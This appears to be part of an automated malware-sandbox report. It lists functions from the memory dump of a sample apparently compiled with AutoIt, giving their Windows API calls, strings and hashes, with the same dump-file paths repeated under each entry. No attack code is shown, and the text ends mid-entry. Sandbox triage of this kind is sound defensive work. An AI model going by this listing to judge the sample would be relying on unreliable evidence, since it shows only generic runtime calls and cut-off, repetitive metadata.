Source File: 00000001.00000002.1344759190.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000001.00000002.1344687893.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008E9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345074943.00000000008EF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345092206.00000000008F0000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7d0000_YPSvIjQCzd.jbxd

Similarity

API ID: Menu$Item$CountCreateInfoInsertPopup_memset
String ID:
API String ID: 3311875123-0
Opcode ID: 761668f0e25565e96cb356657cf3196ef913a72aae257ad5bc8731d2c241b10f
Instruction ID: 15bed7d9763266c8270290408fdc0260aa5094aa4c35c76e841483c1ce2d2643
Opcode Fuzzy Hash: 761668f0e25565e96cb356657cf3196ef913a72aae257ad5bc8731d2c241b10f
Instruction Fuzzy Hash: DD519D70A0030AEFDF25CF68D888AAEBBF5FF84318F104169E921DB291D7749945CB91

Function 007D1765 Relevance: 9.1, APIs: 6, Instructions: 113COMMON

Download Yara Rule

APIs

Part of subcall function 007D2612: GetWindowLongW.USER32(?,000000EB), ref: 007D2623

BeginPaint.USER32(?,?,?,?,?,?), ref: 007D179A
GetWindowRect.USER32(?,?), ref: 007D17FE
ScreenToClient.USER32(?,?), ref: 007D181B
SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 007D182C
EndPaint.USER32(?,?), ref: 007D1876

Memory Dump Source

Source File: 00000001.00000002.1344759190.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000001.00000002.1344687893.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008E9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345074943.00000000008EF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345092206.00000000008F0000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7d0000_YPSvIjQCzd.jbxd

Similarity

API ID: PaintWindow$BeginClientLongRectScreenViewport
String ID:
API String ID: 1827037458-0
Opcode ID: 0a77b3b04af67f149a89ed25c7e76c04fbc755db977b55b2fdd38c23731f09f3
Instruction ID: ec1846a82c82997bad35cc80f3fa63f1d4aee5c80cac81e05200163cc98ea60d
Opcode Fuzzy Hash: 0a77b3b04af67f149a89ed25c7e76c04fbc755db977b55b2fdd38c23731f09f3
Instruction Fuzzy Hash: F6418C70204300AFDB11EF25CC84BBA7BF8FB49734F04066AFAA4872A2D7359845DB61

Function 0085B958 Relevance: 9.1, APIs: 6, Instructions: 109windowCOMMON

Download Yara Rule

APIs

ShowWindow.USER32(008967B0,00000000,016335D8,?,?,008967B0,?,0085B862,?,?), ref: 0085B9CC
EnableWindow.USER32(00000000,00000000), ref: 0085B9F0
ShowWindow.USER32(008967B0,00000000,016335D8,?,?,008967B0,?,0085B862,?,?), ref: 0085BA50
ShowWindow.USER32(00000000,00000004,?,0085B862,?,?), ref: 0085BA62
EnableWindow.USER32(00000000,00000001), ref: 0085BA86
SendMessageW.USER32(?,0000130C,?,00000000), ref: 0085BAA9

Memory Dump Source

Source File: 00000001.00000002.1344759190.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000001.00000002.1344687893.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008E9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345074943.00000000008EF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345092206.00000000008F0000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7d0000_YPSvIjQCzd.jbxd

Similarity

API ID: Window$Show$Enable$MessageSend
String ID:
API String ID: 642888154-0
Opcode ID: d407ec2985903c13f34bc186cdce49a45b5451e1c3a41fe0937719a5efdbb334
Instruction ID: 46f4e5671ec5606c37ad11a97485296799b0b6307ef1d48c3a6e94f362bf06ba
Opcode Fuzzy Hash: d407ec2985903c13f34bc186cdce49a45b5451e1c3a41fe0937719a5efdbb334
Instruction Fuzzy Hash: AF414E30601251AFDB22CF18D489B957FE1FB15312F1842A9FE48CF2A2D731E849CB51

Function 008473B1 Relevance: 9.1, APIs: 6, Instructions: 97COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32(?,?,?,?,?,?,00845134,?,?,00000000,00000001), ref: 008473BF

Part of subcall function 00843C94: GetWindowRect.USER32(?,?), ref: 00843CA7

GetDesktopWindow.USER32 ref: 008473E9
GetWindowRect.USER32(00000000), ref: 008473F0
mouse_event.USER32(00008001,?,?,00000001,00000001), ref: 00847422

Part of subcall function 008354E6: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 0083555E

GetCursorPos.USER32(?), ref: 0084744E
mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 008474AC

Memory Dump Source

Source File: 00000001.00000002.1344759190.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000001.00000002.1344687893.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008E9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345074943.00000000008EF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345092206.00000000008F0000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7d0000_YPSvIjQCzd.jbxd

Similarity

API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
String ID:
API String ID: 4137160315-0
Opcode ID: de27f505337af73e9cb1752b9546b6d2d0ce7377b4a63a0a1668d4bc1d1cd947
Instruction ID: 9460b56ed1a2ff486ebe600339b9464f7816f7005eaa76b3477ceb1d31b04dd3
Opcode Fuzzy Hash: de27f505337af73e9cb1752b9546b6d2d0ce7377b4a63a0a1668d4bc1d1cd947
Instruction Fuzzy Hash: EF31B272508309ABD720DF54D849EABBBE9FF88314F00091AF589D7192D734EA48CBD6

Function 0082E0B5 Relevance: 9.1, APIs: 6, Instructions: 90memoryCOMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0082E0FA
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0082E120
SysAllocString.OLEAUT32(00000000), ref: 0082E123
SysAllocString.OLEAUT32 ref: 0082E144
SysFreeString.OLEAUT32 ref: 0082E14D
SysAllocString.OLEAUT32(?), ref: 0082E175

Memory Dump Source

Source File: 00000001.00000002.1344759190.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000001.00000002.1344687893.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008E9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345074943.00000000008EF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345092206.00000000008F0000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7d0000_YPSvIjQCzd.jbxd

Similarity

API ID: String$Alloc$ByteCharMultiWide$Free
String ID:
API String ID: 1313759350-0
Opcode ID: 5e684f963e04932ccdb0f2030ebed025d7f846f9f7eba6d0a05ada82d2577c54
Instruction ID: 01584652d70c7dd7ae72f79030b2bdca5aef58fb22f0f914b3cf0fa72684e10c
Opcode Fuzzy Hash: 5e684f963e04932ccdb0f2030ebed025d7f846f9f7eba6d0a05ada82d2577c54
Instruction Fuzzy Hash: 5D216235604218BFDB109FA8DC88CAB77ECFB09761B108135FA55CB2A1DA74DC818B68

Function 0083ED8E Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 323COMMON

Download Yara Rule

APIs

Part of subcall function 007D9997: __itow.LIBCMT ref: 007D99C2
Part of subcall function 007D9997: __swprintf.LIBCMT ref: 007D9A0C

Part of subcall function 007EFEC6: _wcscpy.LIBCMT ref: 007EFEE9

_wcstok.LIBCMT ref: 0083EEFF
_wcscpy.LIBCMT ref: 0083EF8E
_memset.LIBCMT ref: 0083EFC1

Strings

X, xrefs: 0083EFFE

Memory Dump Source

Source File: 00000001.00000002.1344759190.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000001.00000002.1344687893.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008E9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345074943.00000000008EF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345092206.00000000008F0000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7d0000_YPSvIjQCzd.jbxd

Similarity

API ID: _wcscpy$__itow__swprintf_memset_wcstok
String ID: X
API String ID: 774024439-3081909835
Opcode ID: 12c2c084128a5556fee1efefd5b1be16807f35f9682a8daceb2890a710184203
Instruction ID: b5cf4609fadfc6f25fabd42c97df56a45afedae2dcb2f43ed5c46bb918a415a3
Opcode Fuzzy Hash: 12c2c084128a5556fee1efefd5b1be16807f35f9682a8daceb2890a710184203
Instruction Fuzzy Hash: D2C13871508701DFC724EF24C889A6AB7E4FF84310F04496EF999973A2EB74E945CB92

Function 00828D5B Relevance: 9.1, APIs: 6, Instructions: 69memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 008285F1: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00828608
Part of subcall function 008285F1: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00828612
Part of subcall function 008285F1: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00828621
Part of subcall function 008285F1: RtlAllocateHeap.NTDLL(00000000,?,00000002), ref: 00828628
Part of subcall function 008285F1: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 0082863E

GetLengthSid.ADVAPI32(?,00000000,00828977), ref: 00828DAC
GetProcessHeap.KERNEL32(00000008,00000000), ref: 00828DB8
RtlAllocateHeap.NTDLL(00000000), ref: 00828DBF
CopySid.ADVAPI32(00000000,00000000,?), ref: 00828DD8
GetProcessHeap.KERNEL32(00000000,00000000,00828977), ref: 00828DEC
HeapFree.KERNEL32(00000000), ref: 00828DF3

Memory Dump Source

Source File: 00000001.00000002.1344759190.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000001.00000002.1344687893.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008E9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345074943.00000000008EF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345092206.00000000008F0000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7d0000_YPSvIjQCzd.jbxd

Similarity

API ID: Heap$Process$AllocateInformationToken$CopyErrorFreeLastLength
String ID:
API String ID: 169236558-0
Opcode ID: 27635c5077d20daa6309cf6d3c656474f7581feaf54193cb648820cd1fec8f51
Instruction ID: 36cfc516138ef8dc55fd11db59d41c6f5a6d512c6d2c6d5994c2e76a62ade7c7
Opcode Fuzzy Hash: 27635c5077d20daa6309cf6d3c656474f7581feaf54193cb648820cd1fec8f51
Instruction Fuzzy Hash: A811EE31542A14FFDF109FA4EC08BAE7BA9FF55316F108029E945D3291CB36A988CB60

Function 0085C19A Relevance: 9.0, APIs: 6, Instructions: 49COMMON

Download Yara Rule

APIs

Part of subcall function 007D12F3: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 007D134D
Part of subcall function 007D12F3: SelectObject.GDI32(?,00000000), ref: 007D135C
Part of subcall function 007D12F3: BeginPath.GDI32(?), ref: 007D1373
Part of subcall function 007D12F3: SelectObject.GDI32(?,00000000), ref: 007D139C

MoveToEx.GDI32(00000000,-00000002,?,00000000), ref: 0085C1C4
LineTo.GDI32(00000000,00000003,?), ref: 0085C1D8
MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 0085C1E6
LineTo.GDI32(00000000,00000000,?), ref: 0085C1F6
EndPath.GDI32(00000000), ref: 0085C206
StrokePath.GDI32(00000000), ref: 0085C216

Memory Dump Source

Source File: 00000001.00000002.1344759190.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000001.00000002.1344687893.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008E9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345074943.00000000008EF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345092206.00000000008F0000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7d0000_YPSvIjQCzd.jbxd

Similarity

API ID: Path$LineMoveObjectSelect$BeginCreateStroke
String ID:
API String ID: 43455801-0
Opcode ID: 21b1d1d1276a338d1e3de623173b119c014a03478c64aebf1520191dcbc1b214
Instruction ID: e00c0b815107155f035c66a5ab46e22a3e195dc51599148f5f9a45ea5de9f772
Opcode Fuzzy Hash: 21b1d1d1276a338d1e3de623173b119c014a03478c64aebf1520191dcbc1b214
Instruction Fuzzy Hash: CC111E7640020CBFDF129F90DC48E9A7FADFF04395F048061BA18961A2D7729D55DFA0

Function 007F03A2 Relevance: 9.0, APIs: 6, Instructions: 44keyboardCOMMON

Download Yara Rule

APIs

MapVirtualKeyW.USER32(0000005B,00000000), ref: 007F03D3
MapVirtualKeyW.USER32(00000010,00000000), ref: 007F03DB
MapVirtualKeyW.USER32(000000A0,00000000), ref: 007F03E6
MapVirtualKeyW.USER32(000000A1,00000000), ref: 007F03F1
MapVirtualKeyW.USER32(00000011,00000000), ref: 007F03F9
MapVirtualKeyW.USER32(00000012,00000000), ref: 007F0401

Memory Dump Source

Source File: 00000001.00000002.1344759190.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000001.00000002.1344687893.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008E9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345074943.00000000008EF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345092206.00000000008F0000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7d0000_YPSvIjQCzd.jbxd

Similarity

API ID: Virtual
String ID:
API String ID: 4278518827-0
Opcode ID: 1b767aead68275efb369a0a3c06028964213043c77add43bd03a685e539eb7dc
Instruction ID: 013104a061c85d5d0551f969749005f273b7dde5f8e45d9bef76f6aa3116bbdb
Opcode Fuzzy Hash: 1b767aead68275efb369a0a3c06028964213043c77add43bd03a685e539eb7dc
Instruction Fuzzy Hash: 6A016CB09017597DE3009F5A8C85B52FFE8FF19354F00411BA15C47942C7F5A864CBE5

Function 0083568B Relevance: 9.0, APIs: 6, Instructions: 43windowtimethreadCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,00000010,00000000,00000000), ref: 0083569B
SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 008356B1
GetWindowThreadProcessId.USER32(?,?), ref: 008356C0
OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 008356CF
TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 008356D9
CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 008356E0

Memory Dump Source

Source File: 00000001.00000002.1344759190.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000001.00000002.1344687893.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008E9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345074943.00000000008EF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345092206.00000000008F0000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7d0000_YPSvIjQCzd.jbxd

Similarity

API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
String ID:
API String ID: 839392675-0
Opcode ID: 1e4bfb714c5c470d5dd6394b9daf59b32ee39e0cf56627e900a1f8d505b5c539
Instruction ID: 477126330fe19c1200e8e8547e6c1fff7a6a09ee9d938f0f9f7eadfaeee93f65
Opcode Fuzzy Hash: 1e4bfb714c5c470d5dd6394b9daf59b32ee39e0cf56627e900a1f8d505b5c539
Instruction Fuzzy Hash: DCF01231141658BBE7215B529C0DEEB7F7CFBD6B12F000169FB05D105196A51A0186B5

Function 008374D2 Relevance: 9.0, APIs: 6, Instructions: 33synchronizationthreadCOMMONLIBRARYCODE

Download Yara Rule

APIs

InterlockedExchange.KERNEL32(?,?), ref: 008374E5
RtlEnterCriticalSection.NTDLL(?), ref: 008374F6
TerminateThread.KERNEL32(00000000,000001F6,?,007E1044,?,?), ref: 00837503
WaitForSingleObject.KERNEL32(00000000,000003E8,?,007E1044,?,?), ref: 00837510

Part of subcall function 00836ED7: CloseHandle.KERNEL32(00000000,?,0083751D,?,007E1044,?,?), ref: 00836EE1

InterlockedExchange.KERNEL32(?,000001F6), ref: 00837523
RtlLeaveCriticalSection.NTDLL(?), ref: 0083752A

Memory Dump Source

Source File: 00000001.00000002.1344759190.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000001.00000002.1344687893.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008E9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345074943.00000000008EF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345092206.00000000008F0000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7d0000_YPSvIjQCzd.jbxd

Similarity

API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
String ID:
API String ID: 3495660284-0
Opcode ID: b1f53bf2663d7056870364da5b4c106c2cf4854a12a41162e47f817cff1162e5
Instruction ID: 5df2ceed67c9ce73f48bf2a76245dca92d0a12d55f98a2bc43606be0ab918098
Opcode Fuzzy Hash: b1f53bf2663d7056870364da5b4c106c2cf4854a12a41162e47f817cff1162e5
Instruction Fuzzy Hash: 1FF03ABA141712ABEB122B64EC8CAEB772AFF45303F500531F202914A2DB795815CA90

Function 00848902 Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 225COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 00848928
CharUpperBuffW.USER32(?,?), ref: 00848A37
VariantClear.OLEAUT32(?), ref: 00848BAF

Part of subcall function 00837804: VariantInit.OLEAUT32(00000000), ref: 00837844
Part of subcall function 00837804: VariantCopy.OLEAUT32(00000000,?), ref: 0083784D
Part of subcall function 00837804: VariantClear.OLEAUT32(00000000), ref: 00837859

Strings

AUTOIT.ERROR, xrefs: 00848A3D
Incorrect Parameter format, xrefs: 00848960, 00848B22

Memory Dump Source

Source File: 00000001.00000002.1344759190.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000001.00000002.1344687893.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008E9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345074943.00000000008EF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345092206.00000000008F0000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7d0000_YPSvIjQCzd.jbxd

Similarity

API ID: Variant$ClearInit$BuffCharCopyUpper
String ID: AUTOIT.ERROR$Incorrect Parameter format
API String ID: 4237274167-1221869570
Opcode ID: 19fd732a0bcf5697ab356f1ea42d90022e0bb516cd692fe9e4f552201a598664
Instruction ID: 5e0b7c7e234725417d6ab3f3bd574970bf247f672e0b9ae975d989e0dc7b8997
Opcode Fuzzy Hash: 19fd732a0bcf5697ab356f1ea42d90022e0bb516cd692fe9e4f552201a598664
Instruction Fuzzy Hash: A1912371608705DFC714EF28C48496ABBE4FB88314F04896EF99ACB362DB30E945CB52

Function 00832F86 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 195windowCOMMON

Download Yara Rule

APIs

Part of subcall function 007EFEC6: _wcscpy.LIBCMT ref: 007EFEE9

_memset.LIBCMT ref: 00833077
GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 008330A6
SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00833159
SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 00833187

Strings

0, xrefs: 00833063

Memory Dump Source

Source File: 00000001.00000002.1344759190.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000001.00000002.1344687893.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008E9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345074943.00000000008EF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345092206.00000000008F0000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7d0000_YPSvIjQCzd.jbxd

Similarity

API ID: ItemMenu$Info$Default_memset_wcscpy
String ID: 0
API String ID: 4152858687-4108050209
Opcode ID: 236798d92744b0748e7c337a7fa9d7dc25ad00a5775487fe59bde8e3066b96f6
Instruction ID: 15a46d09a7295509980a00aa969f061ee64d342ef43bfc6a11c9e69071cfa418
Opcode Fuzzy Hash: 236798d92744b0748e7c337a7fa9d7dc25ad00a5775487fe59bde8e3066b96f6
Instruction Fuzzy Hash: 00519031609301AAD725AF28C849A6FBBE8FFC5354F040A2EF995D6291DB74CA4487D2

Function 00832C42 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 114windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00832CAF
GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 00832CCB
DeleteMenu.USER32(?,00000007,00000000), ref: 00832D11
DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,00896890,00000000), ref: 00832D5A

Strings

0, xrefs: 00832CA4

Memory Dump Source

Source File: 00000001.00000002.1344759190.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000001.00000002.1344687893.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008E9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345074943.00000000008EF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345092206.00000000008F0000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7d0000_YPSvIjQCzd.jbxd

Similarity

API ID: Menu$Delete$InfoItem_memset
String ID: 0
API String ID: 1173514356-4108050209
Opcode ID: c04018cbf56abe6e02798b803221a19264bc38bdee09d6e0bfaa9bf7b40618a9
Instruction ID: dd25d06da8c527516f65d49f85f2d9deaaea554daee5db3df25bed4fb2b8ae01
Opcode Fuzzy Hash: c04018cbf56abe6e02798b803221a19264bc38bdee09d6e0bfaa9bf7b40618a9
Instruction Fuzzy Hash: C2417C30205346AFD724DF28C845B5ABBA8FFC5320F14466EE965D72A1DB70E905CB92

Function 0084DAB9 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 101COMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 0084DAD9

Part of subcall function 007D79AB: _memmove.LIBCMT ref: 007D79F9

Strings

winapi, xrefs: 0084DB4A
stdcall, xrefs: 0084DB5B
cdecl, xrefs: 0084DB30
none, xrefs: 0084DBB4

Memory Dump Source

Source File: 00000001.00000002.1344759190.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000001.00000002.1344687893.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
